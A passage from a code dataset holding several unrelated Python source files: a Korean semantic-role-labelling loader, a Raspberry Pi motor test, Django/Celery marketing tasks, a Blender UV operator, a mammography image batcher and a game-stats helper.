s[2]] for s in sentences]\n\twords3 = [[[word] for word in s[3]] for s in sentences]\n\twords4 = [[[word] for word in s[4]] for s in sentences]\n\tdico = create_dico(words1 + words2 + words3 + words4)\n\tdico[\"\"] = 10000001\n\tdico[''] = 10000000\n\tword_to_id, id_to_word = create_mapping(dico)\n\tprint(\"Found %i unique words\" % (len(dico)))\n\treturn dico, word_to_id, id_to_word\n\n\ndef pumsa_mapping(sentences):\n\t\"\"\"\n\t단어 사전을 구축한다.\n\t\"\"\"\n\tpumsas1 = [[[word] for word in s[5]] for s in sentences]\n\tpumsas2 = [[[word] for word in s[6]] for s in sentences]\n\tpumsas3 = [[[word] for word in s[7]] for s in sentences]\n\tpumsas4 = [[[word] for word in s[8]] for s in sentences]\n\tdico = create_dico(pumsas1 + pumsas2 + pumsas3 + pumsas4)\n\tdico[\"\"] = 10000001\n\tdico[''] = 10000000\n\tpumsa_to_id, id_to_pumsa = create_mapping(dico)\n\tprint(\"Found %i unique pumsa\" % (len(pumsa_to_id)))\n\treturn dico, pumsa_to_id, id_to_pumsa\n\n\ndef char_mapping(sentences, lower):\n\t\"\"\"\n\t음절 사전을 구축한다.\n\t\"\"\"\n\tif lower:\n\t\tchars = [[[char for char in word.lower()] for word in s[-2]] for s in sentences]\n\telse:\n\t\tchars = [[[char for char in word] for word in s[-2]] for s in sentences]\n\tdico = create_dico(chars)\n\tdico[\"\"] = 10000001\n\tdico[''] = 10000000\n\tchar_to_id, id_to_char = create_mapping(dico)\n\tprint(\"Found %i unique chars\" % (len(dico)))\n\treturn dico, char_to_id, id_to_char\n\n\ndef tag_mapping(sentences):\n\t\"\"\"\n\tCreate a dictionary and a mapping of tags, sorted by frequency.\n\t\"\"\"\n\ttags = [[tag for tag in s[-1]] for s in sentences]\n\tdico = create_dico(tags)\n\ttag_to_id, id_to_tag = create_mapping(dico)\n\tprint(\"Found %i unique tags\" % len(dico))\n\treturn dico, tag_to_id, id_to_tag\n\n\ndef load_word_embedding_matrix(config, embed_file_path, word_to_id):\n\tprint(\"Loading Pre-trained Embedding Model and merging it with current dict\")\n\tif not config[\"pretrained_embedding\"]:\n\t\tprint(\"No Pre-trained Embedding!\")\n\t\treturn None\n\n\t# Get values from pre-trained word embedding\n\tembedding_dict = {}\n\tcnt = 0\n\texcept_cnt = 0\n\ttotal_size = len(word_to_id)\n\twith open(embed_file_path, 'r') as f:\n\t# with open(embed_file_path, 'rb') as f:\n\t\tfor idx, line in enumerate(f.readlines()):\n\t\t\t# try:\n\t\t\t# \tline = line.decode(\"euc-kr\")\n\t\t\t# except:\n\t\t\t# \texcept_cnt += 1\n\t\t\t# \tcontinue\n\t\t\tif line.strip():\n\t\t\t\tword = line.strip().split(' ')[0]\n\t\t\t\tif word == \"PADDING\":\n\t\t\t\t\tword = \"\"\n\t\t\t\telif word == \"UNK\":\n\t\t\t\t\tword = \"\"\n\t\t\t\t_embedding = [v for v in line.strip().split(' ')[1:]]\n\t\t\t\tembedding = np.array(_embedding)\n\t\t\t\tembedding_dict[word] = embedding\n\n\n\tnp.random.seed(0)\t#for reproducibility\n\tembedding_matrix = np.random.randn(len(word_to_id), config[\"word_dim\"])\t#현재 100\n\n\tfor k, v in word_to_id.items():\n\t\tword_vector = embedding_dict.get(k, None)\n\t\tif word_vector is not None:\n\t\t\tcnt += 1\n\t\t\tembedding_matrix[v] = word_vector\n\n\t#replace padding in embedding matrix into np.zeros\n\tpad_index = word_to_id['']\n\tembedding_matrix[pad_index] = np.zeros(config[\"word_dim\"])\n\n\tprint(\"Loaded word embedding from %s\" % embed_file_path)\n\tprint(\"%s / %s\" %(cnt, total_size))\n\tprint(\"word except : %s\", except_cnt)\n\treturn embedding_matrix\n\n\ndef only_frequent_affix(dico, frequency):\n\tselectedKeys = list()\n\tfor k, v in dico.items():\n\t\tif v < frequency:\n\t\t\tselectedKeys.append(k)\n\n\tfor k in selectedKeys:\n\t\tif k in dico:\n\t\t\tdel dico[k]\n\n\treturn dico\n\n\ndef affix_mapping_with_word(sentences, type, size, frequency):\n\t\"\"\"\n\tAffix 사전을 구축한다.\n\t형태소 기준으로 구축할 지, 원 단어 기준으로 구축할 지 미정\n\t현재는 원 단어 기준\n\t:param sentences: list형태의 sentence 정보\n\t:param *_size: *의 n-gram의 size\n\t:param frequency: frequency의 threshold ex) 50이상 등장\n\t:return:\n\t\"\"\"\n\taffixes = []\n\tfor sentence in sentences:\n\t\taffix = []\n\t\t# 단어 기준으로 affix 진행 시\n\t\tfor word in sentence[-2]:\n\t\t\taff_tmp = \"\"\n\t\t\tif len(word) < size:\n\t\t\t\tfor i in range(size - len(word)):\n\t\t\t\t\taff_tmp += \"^\"\n\t\t\t\tif type == 'prefix':\n\t\t\t\t\taff_tmp = aff_tmp + word # size가 3이라면 ><><안 이런식으로\n\t\t\t\telif type == 'suffix':\n\t\t\t\t\taff_tmp = word + aff_tmp # size가 3이라면 다><>< 이런식으로\n\t\t\telif len(word) == size:\n\t\t\t\taff_tmp = word\n\t\t\telse:\n\t\t\t\tidx = size - len(word)\n\t\t\t\tif type == 'prefix':\n\t\t\t\t\taff_tmp = word[:idx] # size가 3이면 apple => app\n\t\t\t\telif type == 'suffix':\n\t\t\t\t\taff_tmp = word[-idx:] # size가 3이면 apple => ple\n\t\t\taffix.append(aff_tmp)\n\t\taffixes.append(affix)\n\n\twhole_aff_dico = create_dico(affixes) # 전체 prefix 사전\n\taff_dico = only_frequent_affix(whole_aff_dico, frequency) # frequent한 것만 모아놓은 사전\n\taff_dico[\"\"] = 10000001\n\taff_dico[\"\"] = 10000000\n\n\taff_to_id, id_to_aff = create_mapping(aff_dico)\n\tprint(\"Found %i unique %s\" % (len(aff_dico), type))\n\treturn aff_dico, aff_to_id, id_to_aff\n\n\ndef affix_mapping_with_pos(sentences, type, size, frequency):\n\t\"\"\"\n\tAffix 사전을 구축한다.\n\t형태소 기준으로 구축할 지, 원 단어 기준으로 구축할 지 미정\n\t현재는 원 단어 기준\n\t:param sentences: list형태의 sentence 정보\n\t:param *_size: *의 n-gram의 size\n\t:param frequency: frequency의 threshold ex) 50이상 등장\n\t:return:\n\t\"\"\"\n\taffixes = []\n\tfor sentence in sentences:\n\t\taffix = []\n\t\t# 단어 기준으로 affix 진행 시\n\t\t# for word in sentence[-2]:\n\n\t\t# 형태소 기준으로 affix 진행 시\n\t\tfor eojeol in sentence[-3]:\n\t\t\tword = \"\"\n\t\t\tfor w in eojeol.split('|'):\n\t\t\t\tword += w.split('/')[0]\n\n\t\t\taff_tmp = \"\"\n\t\t\tif len(word) < size:\n\t\t\t\tfor i in range(size - len(word)):\n\t\t\t\t\taff_tmp += \"^\"\n\t\t\t\tif type == 'prefix':\n\t\t\t\t\taff_tmp = aff_tmp + word # size가 3이라면 ><><안 이런식으로\n\t\t\t\telif type == 'suffix':\n\t\t\t\t\taff_tmp = word + aff_tmp # size가 3이라면 다><>< 이런식으로\n\t\t\telif len(word) == size:\n\t\t\t\taff_tmp = word\n\t\t\telse:\n\t\t\t\tidx = size - len(word)\n\t\t\t\tif type == 'prefix':\n\t\t\t\t\taff_tmp = word[:idx] # size가 3이면 apple => app\n\t\t\t\telif type == 'suffix':\n\t\t\t\t\taff_tmp = word[-idx:] # size가 3이면 apple => ple\n\t\t\taffix.append(aff_tmp)\n\t\taffixes.append(affix)\n\n\twhole_aff_dico = create_dico(affixes) # 전체 prefix 사전\n\taff_dico = only_frequent_affix(whole_aff_dico, frequency) # frequent한 것만 모아놓은 사전\n\taff_dico[\"\"] = 10000001\n\taff_dico[\"\"] = 10000000\n\n\taff_to_id, id_to_aff = create_mapping(aff_dico)\n\tprint(\"Found %i unique %s\" % (len(aff_dico), type))\n\treturn aff_dico, aff_to_id, id_to_aff\n\n\ndef get_affix_ids_with_word(sentence, aff_to_ids, type, config):\n\tids = []\n\tfor word in sentence:\n\t\taff_tmp = \"\"\n\t\t# suf_tmp = \"\"\n\t\tif len(word) < config[\"affix_size\"]:\n\t\t\tfor i in range(config[\"affix_size\"] - len(word)):\n\t\t\t\taff_tmp += \"^\"\n\t\t\tif type == 'prefix':\n\t\t\t\taff_tmp = aff_tmp + word # size가 3이라면 ><><안 이런식으로\n\t\t\telif type == 'suffix':\n\t\t\t\taff_tmp = word + aff_tmp # size가 3이라면 다><>< 이런식으로\n\t\telif len(word) == config[\"affix_size\"]:\n\t\t\taff_tmp = word\n\t\telse:\n\t\t\tidx = config[\"affix_size\"] - len(word)\n\t\t\tif type == 'prefix':\n\t\t\t\taff_tmp = word[:idx] # size가 3이면 apple => app\n\t\t\telif type == 'suffix':\n\t\t\t\taff_tmp = word[-idx:] # size가 3이면 apple => ple\n\t\tif aff_tmp in aff_to_ids:\n\t\t\tids.append(aff_to_ids[aff_tmp])\n\t\telse:\n\t\t\tids.append(aff_to_ids[\"\"])\n\treturn ids\n\n\ndef get_affix_ids_with_pos(sentence, aff_to_ids, type, config):\n\tids = []\n\tfor eojeol in sentence:\n\t\tword = \"\"\n\t\tfor w in eojeol.split('|'):\n\t\t\tword += w.split('/')[0]\n\t\taff_tmp = \"\"\n\t\t# suf_tmp = \"\"\n\t\tif len(word) < config[\"affix_size\"]:\n\t\t\tfor i in range(config[\"affix_size\"] - len(word)):\n\t\t\t\taff_tmp += \"^\"\n\t\t\tif type == 'prefix':\n\t\t\t\taff_tmp = aff_tmp + word # size가 3이라면 ><><안 이런식으로\n\t\t\telif type == 'suffix':\n\t\t\t\taff_tmp = word + aff_tmp # size가 3이라면 다><>< 이런식으로\n\t\telif len(word) == config[\"affix_size\"]:\n\t\t\taff_tmp = word\n\t\telse:\n\t\t\tidx = config[\"affix_size\"] - len(word)\n\t\t\tif type == 'prefix':\n\t\t\t\taff_tmp = word[:idx] # size가 3이면 apple => app\n\t\t\telif type == 'suffix':\n\t\t\t\taff_tmp = word[-idx:] # size가 3이면 apple => ple\n\t\tif aff_tmp in aff_to_ids:\n\t\t\tids.append(aff_to_ids[aff_tmp])\n\t\telse:\n\t\t\tids.append(aff_to_ids[\"\"])\n\treturn ids\n\n\ndef prepare_dataset(dataset, word_to_id, pumsa_to_id, char_to_id, tag_to_id, elmo_dict, config, train=True):\n\t\"\"\"\n\t데이터셋 전처리를 수행한다.\n\treturn : list of list of dictionary\n\tdictionry\n\t\t- word indices\n\t\t- word char indices\n\t\t- tag indices\n\t\"\"\"\n\tnone_index = tag_to_id[\"-\"] if \"-\" in tag_to_id else tag_to_id[\"-\"]\n\n\tdata = []\n\tfor idx, sen in enumerate(dataset):\n\t\t# sen : [['1', '2', '3', '4', '5', '6', '7', '8', '9', '10'], ['나는', '다른', '방배들과', '한', '다발씩', '묶여', '컴컴한', '금융기관', '속으로', '옮겨졌다.'], ['ARG0', '-', '-', '-', '-', '-', '-', '-', 'ARG3', '-']]\n\t\tfw_elmo_input = []\n\t\tif config['elmo']:\n\t\t\tfor elmo_morph in sen[9]:\n\t\t\t\ttmp_morph = []\n\t\t\t\telmo_idx = elmo_morph.rfind(\"/\")\n\t\t\t\tfor elmo_char in elmo_morph[:elmo_idx]:\n\t\t\t\t\tif len(elmo_morph[:elmo_idx]) >= 15:\n\t\t\t\t\t\ttmp_morph.append(elmo_dict[\"\"])\n\t\t\t\t\t\tbreak\n\t\t\t\t\telif elmo_char in elmo_dict:\n\t\t\t\t\t\ttmp_morph.append(elmo_dict[elmo_char])\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_morph.append(elmo_dict[\"\"])\n\t\t\t\tfw_elmo_input.append(tmp_morph)\n\n\t\tword_ids1 = [word_to_id[w] if w in word_to_id else word_to_id[''] for w in sen[1]]\n\t\tword_ids2 = [word_to_id[w] if w in word_to_id else word_to_id[''] for w in sen[2]]\n\t\tword_ids3 = [word_to_id[w] if w in word_to_id else word_to_id[''] for w in sen[3]]\n\t\tword_ids4 = [word_to_id[w] if w in word_to_id else word_to_id[''] for w in sen[4]]\n\n\t\tpumsa_ids1 = [pumsa_to_id[p] if p in pumsa_to_id else pumsa_to_id[''] for p in sen[5]]\n\t\tpumsa_ids2 = [pumsa_to_id[p] if p in pumsa_to_id else pumsa_to_id[''] for p in sen[6]]\n\t\tpumsa_ids3 = [pumsa_to_id[p] if p in pumsa_to_id else pumsa_to_id[''] for p in sen[7]]\n\t\tpumsa_ids4 = [pumsa_to_id[p] if p in pumsa_to_id else pumsa_to_id[''] for p in sen[8]]\n\n\t\tchars = [[char_to_id[c if c in char_to_id else '']\n\t\t\t\t for c in word] for word in sen[-2]]\n\t\tif train:\n\t\t\ttag_ids = [tag_to_id[l] for l in sen[-1]]\n\t\telse:\n\t\t\ttag_ids = [none_index for _ in chars]\n\t\tdata.append([word_ids1, word_ids2, word_ids3, word_ids4,\n\t\t\t\t\t pumsa_ids1, pumsa_ids2, pumsa_ids3, pumsa_ids4, fw_elmo_input, sen[10], sen[11], chars, tag_ids])\n\n\treturn data\n\n\ndef _search_index_by_dict( dict, key, size):\n\tif key in dict:\n\t\treturn dict[key]\n\telse:\n\t\tif \"UNK\" in dict:\n\t\t\treturn dict[\"UNK\"]\n\t\telse:\n\t\t\ttemp = [0.0] * 15\n\t\t\ttemp[0] = 1.0\n\t\t\treturn temp\n","sub_path":"labeling_tool/Naver_challange_winners/SRL/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":12563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"197714982","text":"import RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(12, GPIO.OUT)\nGPIO.setup(38, GPIO.OUT)\nGPIO.setup(40, GPIO.OUT)\n#GPIO.setup(35, GPIO.OUT)\n#GPIO.setup(31, GPIO.OUT)\nGPIO.setup(29, GPIO.OUT)\n#GPIO.output(31, False)\nGPIO.output(29, False)\nGPIO.output(38,False)\nGPIO.output(40,False)\np= GPIO.PWM(12,60)\n#q= GPIO.PWM(35,60)\nreverse=0\nforward=1\nvar=1\np.start(0)\n#q.start(0)\n\nwhile var==1:\n try:\n prespeed,preturn= input(\"Type 2 numbers 1=slow, 2=median, 10=fast and neg. for reverse \").split()\n if int(prespeed)<0:\n prespeed=int(prespeed)*int(-1)\n reverse=1\n forward=0\n else:\n reverse=0\n forward=1\n if float(preturn)<0:\n preturn=float(preturn)*float(-1)\n treverse=1\n tforward=0\n else:\n treverse=0\n tforward=1\n \n except (KeyboardInterrupt, SystemExit):\n print (\"user exit\")\n var=0\n GPIO.output(38,False)\n GPIO.output(40,False)\n #GPIO.output(31, False)\n GPIO.output(29, False)\n p.stop()\n #q.stop()\n GPIO.cleanup()\n \n speed= int(prespeed) * int('10')\n turn= float(preturn) * float('5')\n fspeed= float(speed)\n fturn= float(turn)\n #print (fturn)\n p.ChangeDutyCycle(fspeed)\n #q.ChangeDutyCycle(fturn)\n\n\n try:\n GPIO.output(38, reverse)\n GPIO.output(40, forward)\n #GPIO.output(31, reverse)\n GPIO.output(29, forward) \n time.sleep(5)\n #GPIO.output(31, False)\n GPIO.output(29, False) \n \n except KeyboardInterrupt:\n print (\"user exit 2\")\n var=0\n GPIO.output(38,False)\n GPIO.output(40,False)\n GPIO.output(31, False)\n GPIO.output(29, False)\n GPIO.cleanup()\n\n\n\n","sub_path":"motor_pwm_test2.py","file_name":"motor_pwm_test2.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"636920445","text":"import logging\nfrom celery import shared_task, Task\nfrom django.db.models import F\nfrom breathecode.services.activecampaign import ActiveCampaign\nfrom .models import FormEntry, ShortLink, ActiveCampaignWebhook\nfrom .actions import register_new_lead, save_get_geolocal\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseTaskWithRetry(Task):\n autoretry_for = (Exception, )\n # seconds\n retry_kwargs = {'max_retries': 5, 'countdown': 60 * 5}\n retry_backoff = True\n\n\n@shared_task\ndef persist_leads():\n logger.debug('Starting persist_leads')\n entries = FormEntry.objects.filter(storage_status='PENDING')\n for entry in entries:\n form_data = entry.toFormData()\n result = register_new_lead(form_data)\n if result is not None and result != False:\n save_get_geolocal(entry, form_data)\n\n return True\n\n\n@shared_task(bind=True, base=BaseTaskWithRetry)\ndef persist_single_lead(self, form_data):\n logger.debug('Starting persist_single_lead')\n entry = register_new_lead(form_data)\n if entry is not None and entry != False:\n save_get_geolocal(entry, form_data)\n\n return True\n\n\n@shared_task(bind=True, base=BaseTaskWithRetry)\ndef update_link_viewcount(self, slug):\n logger.debug('Starting update_link_viewcount')\n ShortLink.objects.filter(slug=slug).update(hits=F('hits') + 1)\n\n\n@shared_task(bind=True, base=BaseTaskWithRetry)\ndef async_activecampaign_webhook(self, webhook_id):\n logger.debug('Starting async_activecampaign_webhook')\n status = 'ok'\n\n webhook = ActiveCampaignWebhook.objects.filter(id=webhook_id).first()\n ac_academy = webhook.ac_academy\n\n if ac_academy is not None:\n try:\n client = ActiveCampaign(ac_academy.ac_key, ac_academy.ac_url)\n client.execute_action(webhook_id)\n except Exception as e:\n logger.debug(f'ActiveCampaign Webhook Exception')\n logger.debug(str(e))\n status = 'error'\n\n else:\n message = f\"ActiveCampaign Academy Profile {organization_id} doesn\\'t exist\"\n\n webhook.status = 'ERROR'\n webhook.status_text = message\n webhook.save()\n\n logger.debug(message)\n status = 'error'\n\n logger.debug(f'ActiveCampaign webook status: {status}')\n","sub_path":"breathecode/marketing/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"351333335","text":"__author__ = \"kgeogeo, mem, Nutti \"\n__status__ = \"production\"\n__version__ = \"4.0\"\n__date__ = \"XX XXX 2015\"\n\nimport bpy\nimport bpy\nimport bmesh\nfrom bpy.app.handlers import persistent\nfrom bpy_extras.view3d_utils import location_3d_to_region_2d as loc3d2d\nfrom bpy.types import Operator\nfrom bpy.props import FloatVectorProperty\nimport mathutils\nfrom mathutils import *\nfrom math import *\n\n\ndef find_uv(context):\n obj_data = bmesh.from_edit_mesh(context.object.data)\n l = []\n first = 0\n diff = 0\n uvs = []\n for f, face in enumerate(obj_data.faces):\n for v, vertex in enumerate(face.verts):\n if vertex.select:\n uvs.append(obj_data.faces[f].loops[v][obj_data.loops.layers.uv.active].uv.copy())\n l.append([f, v])\n if first == 0:\n v1 = vertex.link_loops[0].vert.co\n sv1 = loc3d2d(context.region, context.space_data.region_3d, v1)\n v2 = vertex.link_loops[0].link_loop_next.vert.co\n sv2 = loc3d2d(context.region, context.space_data.region_3d, v2)\n vres = sv2 - sv1\n va = vres.angle(Vector((0.0, 1.0)))\n\n uv1 = vertex.link_loops[0][obj_data.loops.layers.uv.active].uv\n uv2 = vertex.link_loops[0].link_loop_next[obj_data.loops.layers.uv.active].uv\n uvres = uv2 - uv1\n uva = uvres.angle(Vector((0.0, 1.0)))\n diff = uva - va\n first += 1\n\n return l, diff, uvs\n\n# Oprerator Class to pan the view3D\n\n\nclass MUV_MVUV(bpy.types.Operator):\n bl_idname = \"view3d.muv_mvuv\"\n bl_label = \"Move the UV from 3D view\"\n bl_options = {'REGISTER', 'UNDO'}\n\n l = []\n uva = 0\n first_mouse = FloatVectorProperty(name=\"OffsetUV\", default=(0.0, 0.0), subtype='XYZ', size=2)\n offsetuv = FloatVectorProperty(name=\"OffsetUV\", default=(0.0, 0.0), subtype='XYZ', size=2)\n old_offsetuv = FloatVectorProperty(name=\"old_OffsetUV\", default=(0.0, 0.0), subtype='XYZ', size=2)\n firstuv = FloatVectorProperty(name=\"FirstUV\", default=(0.0, 0.0), subtype='XYZ', size=2)\n first_time = True\n ini_uvs = []\n\n @classmethod\n def poll(cls, context):\n return (context.edit_object)\n\n def modal(self, context, event):\n if self.first_time is True:\n self.first_mouse = Vector((event.mouse_region_x, event.mouse_region_y))\n if event.type == 'LEFTMOUSE' and event.value == 'RELEASE':\n self.first_time = False\n return {'RUNNING_MODAL'}\n ob = context.object\n obj_data = bmesh.from_edit_mesh(ob.data)\n div = 10000\n self.offsetuv += Vector(((event.mouse_region_x - self.first_mouse.x) / div,\n (event.mouse_region_y - self.first_mouse.y) / div))\n\n o = self.offsetuv\n oo = self.old_offsetuv\n for i, j in self.l:\n d = obj_data.faces[i].loops[j][obj_data.loops.layers.uv.active]\n vec = Vector((o.x - o.y, o.x + o.y))\n d.uv = d.uv - Vector((oo.x, oo.y)) + vec\n\n self.old_offsetuv = vec\n self.first_mouse = Vector((event.mouse_region_x, event.mouse_region_y))\n ob.data.update()\n\n if context.user_preferences.inputs.select_mouse == 'RIGHT':\n confirm_btn = 'LEFTMOUSE'\n cancel_btn = 'RIGHTMOUSE'\n else:\n confirm_btn = 'RIGHTMOUSE'\n cancel_btn = 'LEFTMOUSE'\n\n print(repr(event.type))\n\n if event.type == cancel_btn and event.value == 'PRESS':\n for (f, v), uv in zip(self.l, self.ini_uvs):\n obj_data.faces[f].loops[v][obj_data.loops.layers.uv.active].uv = uv\n return {'FINISHED'}\n if event.type == confirm_btn and event.value == 'PRESS':\n return {'FINISHED'}\n return {'RUNNING_MODAL'}\n\n def execute(self, context):\n self.first_time = True\n context.window_manager.modal_handler_add(self)\n self.l, self.uva, self.ini_uvs = find_uv(context)\n return {'RUNNING_MODAL'}\n","sub_path":"scripts/addons_extern/uv_magic_uv/muv_mvuv_ops.py","file_name":"muv_mvuv_ops.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207375893","text":"import dicom\nimport numpy as np\nfrom PIL import Image\nimport csv\nimport os\nfrom scipy.misc import imresize, imsave\nimport matplotlib.pyplot as plt\n\npathology_dict = {'MALIGNANT': 1, 'BENIGN': 0, 'BENIGN_WITHOUT_CALLBACK': 0}\nclass Batcher:\n def __init__(self, batch_sz, metadata, indices, mass_headers, calc_headers, root, attr2onehot, mean=0, std=0, new_batch=False):\n '''\n This batcher takes in rows of metadata formatted\n specifically for DDSM images with the image directory\n structure downloaded from TCIA\n '''\n self.batch_sz = batch_sz\n self.metadata = metadata\n self.mass_headers = mass_headers\n self.calc_headers = calc_headers\n self.indices = indices\n self.root = root\n self.attr2onehot = attr2onehot\n self.mean = mean\n self.new_batch = new_batch\n self.std = std\n \n def visualize(self, img):\n '''\n debug tool: visualize the grey scale image for sanity check.\n '''\n plt.imshow(img, cmap='gray')\n plt.show()\n\n def to_uint8(self, img):\n '''\n converts an image from uint16 to uint8 format.\n uses lookup table to reduce memory usage\n also more efficient\n '''\n lut = np.arange(2**16, dtype='uint16')\n lut -= np.amin(img)\n lut //= int((np.amax(img) - np.amin(img) + 1) / 256)\n return np.take(lut, img)\n\n def resize(self, img, H = 299, W = 299):\n '''\n resize all images to 4000 x 3000 to be batchable\n '''\n return imresize(img, (H, W))\n\n def get_train_stats(self):\n '''\n first pass of images to get mean pixel value for preprocessing\n '''\n it = self.get_iterator(mean_process=True) \n mean = 0.0\n counter = 0\n means = []\n for imgs, labels, _, paths in it:\n for im, image_path in zip(imgs, paths):\n counter += 1\n im = self.to_uint8(im)\n im = self.resize(im)\n im = im.astype(np.float64)\n print('saving {} inside get_train_mean'.format(image_path))\n np.save(image_path, im)\n im /= 255\n H, W = im.shape[0], im.shape[1]\n # incremental mean update for numerical stability\n mean += (np.sum(im) - mean * H * W) / (counter * H * W) \n means.append(np.sum(im) / (H * W))\n std = np.std(means)\n return mean, std\n\n def preprocess(self, img, unseen=False):\n '''\n Preprocessing step:\n convert to 8 bit, resize to H X W, reduce by mean\n '''\n if unseen:\n img = self.to_uint8(img)\n img = self.resize(img)\n img = img.astype(np.float64)\n #if self.mean != 0: \n # img /= 255\n # img -= self.mean \n #if self.std != 0: \n # img /= self.std\n return img\n\n def get_image_from_path(self, path):\n path += '/' + next(os.walk(os.path.expanduser(path)))[1][0]\n path += '/' + next(os.walk(os.path.expanduser(path)))[1][0]\n path += '/' + next(os.walk(os.path.expanduser(path)))[2][0]\n # 4. read image from DICOM format into 16bit pixel value\n DCM_img = dicom.read_file(path)\n img = np.asarray(DCM_img.pixel_array)\n return img\n\n def generate_attribute(self, row, is_mass):\n generic_field = ['breast_density', 'abn_num','assessment', 'subtlety']\n mass_fields = ['mass_shape', 'mass_margins']\n calc_fields = ['calc_type', 'calc_distribution']\n attribute = [] #[0] * 4\n\n # mass: shape 10, margin 7\n # calc: type 15, distrib 6\n # feat1: 17 feat2: 21\n if is_mass:\n for field in generic_field:\n attribute.append(self.attr2onehot['mass'][field][row[self.mass_headers[field]]])\n for field, pad in zip(mass_fields, [15, 6]):\n mass_feature = [0] * len(self.attr2onehot['mass'][field])\n parts = row[self.mass_headers[field]].split('-')\n for part in parts:\n mass_feature[self.attr2onehot['mass'][field][part] - 1] = 1\n #mass_feature[self.attr2onehot['mass'][field][row[self.mass_headers[field]]] - 1] = 1\n attribute += mass_feature\n attribute += [0] * pad\n else:\n for field in generic_field:\n attribute.append(self.attr2onehot['calc'][field][row[self.calc_headers[field]]])\n for field, pad in zip(calc_fields, [10, 7]):\n attribute += [0] * pad\n calc_feature = [0] * len(self.attr2onehot['calc'][field])\n parts = row[self.calc_headers[field]].split('-')\n for part in parts:\n calc_feature[self.attr2onehot['calc'][field][part] - 1] = 1\n #calc_feature[self.attr2onehot['calc'][field][row[self.calc_headers[field]]] - 1] = 1\n attribute += calc_feature\n\n return attribute\n \n def get_iterator(self, mean_process=False):\n '''\n Data iterator. get_iterator returns all batches\n in the form of (X, y) tuples\n '''\n X = []\n y = []\n attributes = []\n new_image_flag = False\n paths = []\n counter = 0\n already_seen = set()\n for i in range(len(self.indices)):\n \n row = self.metadata[self.indices[i]]\n path = self.root + '/'\n # 1. figure out if this image is a mass or a calc\n if 'Mass' in row[self.mass_headers['od_img_path']]:\n path += 'Mass-Training'\n else:\n path += 'Calc-Training'\n # 2. build the image path\n path += '_' + row[self.mass_headers['patient_id']] \\\n + '_' + row[self.mass_headers['side']] + '_' \\\n + row[self.mass_headers['view']]\n \n if not os.path.exists(path) or path in already_seen:\n continue\n\n already_seen.add(path)\n # 3. wade through two layers of useless directories\n down_a_level = next(os.walk(os.path.expanduser(path)))\n image_name = 'image_{}'.format(row[self.mass_headers['patient_id']])\n image_path = path + '/' + image_name\n # if we're trying to just get images for mean calculations\n if mean_process:\n img = self.get_image_from_path(path)\n elif self.new_batch:\n # this means we're relying on mean-processed images to do further processing on\n try:\n img = np.load(image_path + '.npy')\n except:\n raise Exception('Most likely a file read error, or that somehow we tried to read a file we haven\\'t preprocessed before')\n # no unseen flag because we've already seen these images!\n img = self.preprocess(img)\n print('saving {} inside get_iterator'.format(image_path))\n print(img)\n np.save(image_path, img)\n else:\n # we are assuming that all the images have been processed before\n try:\n # print('opening completely preprocessed {} inside get_iterator'.format(image_path))\n img = np.load(image_path + '.npy')\n except:\n img = self.get_image_from_path(path)\n img = self.preprocess(img, unseen=True)\n print('saving {} inside get_iterator'.format(image_path))\n np.save(image_path, img)\n # 6. add the image to the batch \n X.append(img)\n #imsave(\"out/{}.png\".format(row[0]), img)\n # 7. do some mojo with the label and append to y\n # probably gonna be one hot or something\n label = pathology_dict[row[self.mass_headers['pathology']]]\n y.append(label)\n\n # 8. Get those attributes\n if 'Mass' in row[self.mass_headers['od_img_path']]: \n attributes.append(self.generate_attribute(row, True))\n else:\n attributes.append(self.generate_attribute(row, False))\n # only do this if we are trying to make a new batch, and if we are catering to get_train_mean()\n if mean_process:\n paths.append(image_path)\n # 8. check if our batch is ready\n counter += 1\n if counter >= self.batch_sz: \n if mean_process:\n yield (np.asarray(X), np.asarray(y), np.asarray(attributes), paths)\n else:\n yield (np.asarray(X), np.asarray(y), np.asarray(attributes))\n X = []\n y = []\n paths = []\n attributes = []\n counter = 0\n if not X or not y:\n return\n\n if mean_process:\n yield (np.asarray(X), np.asarray(y), np.asarray(attributes), paths)\n else:\n X_out = np.asarray(X)\n y_out = np.asarray(y)\n attrib_out = np.asarray(attributes)\n yield (X_out, y_out, attrib_out)\n","sub_path":"util/Batcher.py","file_name":"Batcher.py","file_ext":"py","file_size_in_byte":9254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"7427947","text":"# -*- coding: utf-8 -*-\n\nfrom ..database import db_function\nfrom ..dbmodels import Game\nfrom . import versions\n\n\n@db_function('re_mode')\ndef re_mode(game_id, mode):\n vclass = versions.get_game_version(game_id)\n\n if game_id in re_mode.cache:\n return re_mode.cache[game_id] == vclass.modes[mode]\n\n game = Game.query.filter(Game.id == game_id).first()\n re_mode.cache[game_id] = game.mode\n\n return game.mode == vclass.modes[mode]\n\n\nre_mode.cache = {}\n\n\n@db_function('re_mut')\ndef re_mut(game_id, mut):\n vclass = versions.get_game_version(game_id)\n\n if game_id in re_mut.cache:\n return mut in vclass.mutslist(\n re_mut.cache[game_id][0],\n re_mut.cache[game_id][1]\n )\n\n game = Game.query.filter(Game.id == game_id).first()\n\n re_mut.cache[game_id] = (game.mode, game.mutators)\n\n return (mut in vclass.mutslist(game.mode, game.mutators))\n\n\nre_mut.cache = {}\n","sub_path":"statsdbinterface/redeclipse/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"53960835","text":"from frequency_analysis import frequency_analysis\nfrom os import listdir\nfrom find_key import find_key\n\ndirectory = \"outs\"\nfiles = listdir(directory)\nfiles.sort()\nfiles = [directory+'/'+file for file in files]\n\nsize = 1\nfa_res = []\ntemp = '0'\nfor filename in files:\n if filename[-3]!=temp:\n fa_res += [[]]\n temp = 